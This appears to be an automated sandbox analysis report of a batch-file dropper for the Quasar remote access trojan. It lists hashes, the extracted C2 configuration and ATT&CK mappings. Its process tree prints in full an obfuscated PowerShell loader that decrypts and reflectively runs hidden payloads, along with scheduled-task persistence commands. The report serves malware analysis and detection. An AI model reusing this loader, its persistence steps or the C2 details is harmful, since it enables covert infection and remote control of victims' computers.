Analysis

  • max time kernel
    24s
  • max time network
    27s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240226-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
  • submitted
    21-04-2024 00:56

General

  • Target

    Uni.bat

  • Size

    1.8MB

  • MD5

    14516087f9549022d5582272910428b1

  • SHA1

    53324370839fa1c07bfa42cf7cb3039513805d42

  • SHA256

    745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e

  • SHA512

    cda051bfe205763fe10c9b6970e3b56c4a6044d42d30c8f5ff1b722318c3b69aa1e86c898f4cb70d6e9c4846db8701e7c85b31c4356bf88ca1a8915bb2e0250f

  • SSDEEP

    24576:Kn1j2//LtzVBqLoCQw/376Fx2S6aryOdijwog7h66zQIG9GcQ0clANNPny:KdMW+wf+UAwIvczy

Malware Config

Extracted

Family

quasar

Version

1.4.1

Botnet

SLAVE

C2

uk2.localto.net:39077

Mutex

cc0a2b76-665e-4e16-b318-5ee02270fbcd

Attributes
  • encryption_key

    D7F09F1F0B9CECC640BA0B3D8975FBE5CED725B5

  • install_name

    UpdateHost.exe

  • log_directory

    Error Logs

  • reconnect_delay

    3000

  • startup_key

    WOS64

  • subdirectory

    Windows

Signatures

  • Quasar RAT

    Quasar is an open source Remote Access Tool.

  • Quasar payload 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies registry class 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Uni.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1892
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJuitVGk2ro0N3Dl271h/Nt65v72klQHrojzsETrplQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qR1c+BKza1ywPSpxU3Z8Bw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pjeaJ=New-Object System.IO.MemoryStream(,$param_var); $sIcuP=New-Object System.IO.MemoryStream; $RYqCQ=New-Object System.IO.Compression.GZipStream($pjeaJ, [IO.Compression.CompressionMode]::Decompress); $RYqCQ.CopyTo($sIcuP); $RYqCQ.Dispose(); $pjeaJ.Dispose(); $sIcuP.Dispose(); $sIcuP.ToArray();}function execute_function($param_var,$param2_var){ $fRWeF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uxOtv=$fRWeF.EntryPoint; $uxOtv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\Uni.bat';$gcCqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\Uni.bat').Split([Environment]::NewLine);foreach ($wdeYw in $gcCqD) { if ($wdeYw.StartsWith(':: ')) { $YNizn=$wdeYw.Substring(3); break; }}$payloads_var=[string[]]$YNizn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
      2⤵
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1096
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'RuntimeBroker_startup_590_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\startup_str_590.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4512
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\startup_str_590.vbs"
        3⤵
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:3624
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\startup_str_590.bat" "
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1140
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('uJuitVGk2ro0N3Dl271h/Nt65v72klQHrojzsETrplQ='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qR1c+BKza1ywPSpxU3Z8Bw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $pjeaJ=New-Object System.IO.MemoryStream(,$param_var); $sIcuP=New-Object System.IO.MemoryStream; $RYqCQ=New-Object System.IO.Compression.GZipStream($pjeaJ, [IO.Compression.CompressionMode]::Decompress); $RYqCQ.CopyTo($sIcuP); $RYqCQ.Dispose(); $pjeaJ.Dispose(); $sIcuP.Dispose(); $sIcuP.ToArray();}function execute_function($param_var,$param2_var){ $fRWeF=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $uxOtv=$fRWeF.EntryPoint; $uxOtv.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Roaming\startup_str_590.bat';$gcCqD=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Roaming\startup_str_590.bat').Split([Environment]::NewLine);foreach ($wdeYw in $gcCqD) { if ($wdeYw.StartsWith(':: ')) { $YNizn=$wdeYw.Substring(3); break; }}$payloads_var=[string[]]$YNizn.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2976
            • C:\Windows\SYSTEM32\schtasks.exe
              "schtasks" /create /tn "WOS64" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe" /rl HIGHEST /f
              6⤵
              • Creates scheduled task(s)
              PID:4300
            • C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe
              "C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious behavior: EnumeratesProcesses
              PID:1868

Network

MITRE ATT&CK Matrix ATT&CK v13

Execution

Scheduled Task/Job

1
T1053

Persistence

Scheduled Task/Job

1
T1053

Privilege Escalation

Scheduled Task/Job

1
T1053

Discovery

Query Registry

2
T1012

System Information Discovery

2
T1082

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
    Filesize

    3KB

    MD5

    661739d384d9dfd807a089721202900b

    SHA1

    5b2c5d6a7122b4ce849dc98e79a7713038feac55

    SHA256

    70c3ecbaa6df88e88df4efc70968502955e890a2248269641c4e2d4668ef61bf

    SHA512

    81b48ae5c4064c4d9597303d913e32d3954954ba1c8123731d503d1653a0d848856812d2ee6951efe06b1db2b91a50e5d54098f60c26f36bc8390203f4c8a2d8

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    5753571cfc81f894ff82dc383591df11

    SHA1

    54dff38cbb912d61f7f2035f97d4dd75cb1a9f04

    SHA256

    c729a5004a163727dcc457585cd06d0ddee9c4a80327bd97383d08fd8ce413bf

    SHA512

    83483e2b4a2ffc2a7f7d38160d3e28f0fbeeac30563f57c8d5a6a9b32069a67ddddfb823c9ff1ae8fd057dfc53b8c8e43e58e0ca5907487b472e3152d21e1fb6

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_m42l5o2g.4hc.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Roaming\Windows\UpdateHost.exe
    Filesize

    442KB

    MD5

    04029e121a0cfa5991749937dd22a1d9

    SHA1

    f43d9bb316e30ae1a3494ac5b0624f6bea1bf054

    SHA256

    9f914d42706fe215501044acd85a32d58aaef1419d404fddfa5d3b48f66ccd9f

    SHA512

    6a2fb055473033fd8fdb8868823442875b5b60c115031aaeda688a35a092f6278e8687e2ae2b8dc097f8f3f35d23959757bf0c408274a2ef5f40ddfa4b5c851b

  • C:\Users\Admin\AppData\Roaming\startup_str_590.bat
    Filesize

    1.8MB

    MD5

    14516087f9549022d5582272910428b1

    SHA1

    53324370839fa1c07bfa42cf7cb3039513805d42

    SHA256

    745517dc1c6f989b9882959b31d34621c3a25dde79054f29ff6d7539a603ea3e

    SHA512

    cda051bfe205763fe10c9b6970e3b56c4a6044d42d30c8f5ff1b722318c3b69aa1e86c898f4cb70d6e9c4846db8701e7c85b31c4356bf88ca1a8915bb2e0250f

  • C:\Users\Admin\AppData\Roaming\startup_str_590.vbs
    Filesize

    115B

    MD5

    fc620f1ab5a3a971335dc5dcec6f7e3e

    SHA1

    2fe328d3fc49cef49dbade3a059325432e4433f3

    SHA256

    2d1813e296fafc65fef73a4ccfa3e48cbe553d1a54fc5334e6436644e29a6543

    SHA512

    f1e5598e04bed8789da16da4830a9a86c95db9081ed838a67a05f9423c87246ad9417c0a6b7d5ac0380aa11f4f0c7fd27ba48e1aba2766b878b941bd11bf2b74

  • memory/1096-42-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmp
    Filesize

    10.8MB

  • memory/1096-15-0x000001FD67480000-0x000001FD675D8000-memory.dmp
    Filesize

    1.3MB

  • memory/1096-10-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmp
    Filesize

    10.8MB

  • memory/1096-14-0x000001FD67450000-0x000001FD67458000-memory.dmp
    Filesize

    32KB

  • memory/1096-13-0x000001FD650F0000-0x000001FD65100000-memory.dmp
    Filesize

    64KB

  • memory/1096-12-0x000001FD650F0000-0x000001FD65100000-memory.dmp
    Filesize

    64KB

  • memory/1096-11-0x000001FD650F0000-0x000001FD65100000-memory.dmp
    Filesize

    64KB

  • memory/1096-41-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmp
    Filesize

    10.8MB

  • memory/1096-5-0x000001FD671E0000-0x000001FD67202000-memory.dmp
    Filesize

    136KB

  • memory/1868-72-0x000001D5C0C40000-0x000001D5C0CB6000-memory.dmp
    Filesize

    472KB

  • memory/1868-71-0x000001D5BE760000-0x000001D5BE770000-memory.dmp
    Filesize

    64KB

  • memory/1868-70-0x000001D5C09F0000-0x000001D5C0A34000-memory.dmp
    Filesize

    272KB

  • memory/1868-60-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmp
    Filesize

    10.8MB

  • memory/2976-52-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmp
    Filesize

    10.8MB

  • memory/2976-54-0x0000010AAC4D0000-0x0000010AAC7F4000-memory.dmp
    Filesize

    3.1MB

  • memory/4512-32-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmp
    Filesize

    10.8MB

  • memory/4512-29-0x000001F160490000-0x000001F1604A0000-memory.dmp
    Filesize

    64KB

  • memory/4512-28-0x000001F160490000-0x000001F1604A0000-memory.dmp
    Filesize

    64KB

  • memory/4512-18-0x000001F160490000-0x000001F1604A0000-memory.dmp
    Filesize

    64KB

  • memory/4512-17-0x00007FFCE8C60000-0x00007FFCE9721000-memory.dmp
    Filesize

    10.8MB